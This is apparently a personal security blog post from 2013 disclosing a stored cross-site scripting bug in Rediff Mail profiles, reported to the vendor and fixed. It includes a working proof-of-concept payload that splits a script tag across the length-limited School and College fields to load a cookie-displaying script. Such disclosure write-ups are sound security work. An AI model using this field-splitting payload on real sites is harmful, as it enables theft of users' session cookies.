Vinesh Redkar
Vinesh Redkar's blog

Vinesh Redkar's blog

Stored XSS On Rediff Mail

Stored XSS On Rediff Mail

Vinesh Redkar's photo
Vinesh Redkar
·May 16, 2013·

2 min read

Subscribe to my newsletter and never miss my upcoming articles

Hi Guys, the other day I have discovered a Stored Cross-Site Scripting (XSS) Issue on Rediff mail and also reported this issue to Rediff didn’t get any credit for it though :-) They dropped me mail notifying me that issue has been addressed. I demonstrate the Stored XSS issue.

But, First of all let’s understand what XSS basically means XSS (Cross-Site Scripting) Cross-Site Scripting attacks are a type of injection problem, in which malicious scripts are injected into the otherwise benign and trusted web sites.

An attacker can use XSS to send a malicious script to an unsuspecting user. The end user’s browser has no way to know that the script should not be trusted, and will execute the script. Because it thinks the script came from a trusted source, the malicious script can access any cookies, session tokens, or other sensitive information retained by your browser and used with that site.

There are basically three types of XSS:

  1. Reflected XSS Attacks
  2. Stored XSS Attacks
  3. Dom Based XSS

So, Let get started. This is an extremely critical vulnerability as the user data will be compromised just by visiting malicious user profile leading to execution of malicious script on the victim browser. Here is a proof of concept of Stored XSS on Rediffmail :)

Firstly, Hosted JavaScript File locally with following content:

document.write (“Stored XSS " + document.cookie);alert (“cookie Value” + document.cookie);”

Hosted Local File.jpg

Based on an my initial analysis it was clear that school and colleague parameter was vulnerable to HTML injection. However, both parameters were having character limitation due to which traditional XSS payload was not working. So I tried to combine both field by using following vector:

School:

/><SCRIPT SRC=“http://localhost/xss/xss.js”/*

College:

*/>

Step 1.jpg

Saved the attack above vector in attacker profile. As soon as the user visits attacker profile malicious script will be executed on his browser.

step 2 XSS execution.jpg

Bingo!! Another Bug ;)

Hope you liked the post, many more bug bounty to come. Once we get the acknowledgment of issues being fixed we will be sharing them with you..

Please feel free to comment. Thanks and Happy Bounty Hunting

Original Article Posted On avsecurity.in/stored-xss-on-rediff-mail-2

 
Share this